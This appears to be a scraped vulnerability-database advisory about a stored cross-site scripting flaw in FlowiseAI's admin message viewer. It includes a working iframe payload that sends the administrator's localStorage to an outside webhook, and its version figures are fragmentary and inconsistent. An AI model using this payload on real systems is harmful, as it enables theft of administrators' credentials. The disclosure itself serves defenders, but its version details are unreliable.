296,663
Total vulnerabilities in the database
A stored Cross-Site Scripting (XSS) vulnerability in FlowiseAI allows a user to inject arbitrary JavaScript code via message input. When an administrator views messages using the "View Messages" button in the workflow UI, the malicious script executes in the context of the admin’s browser, enabling credential theft via access to localStorage
.
The vulnerability stems from a lack of input sanitization when displaying stored user messages in the admin interface. A specially crafted payload using <iframe srcdoc="...">
can include arbitrary JavaScript, which is executed when the message is rendered.
<iframe srcdoc="<script>fetch('http://requestbin.whapi.cloud/XXXXX?d='+encodeURIComponent(JSON.stringify(localStorage)))</script>">
localStorage
content to the attacker-controlled webhook endpoint.localStorage
npm
flowise
< 2.2.7
1
Software | From | Fixed in |
---|---|---|
![]() |
- | 3.0.8 |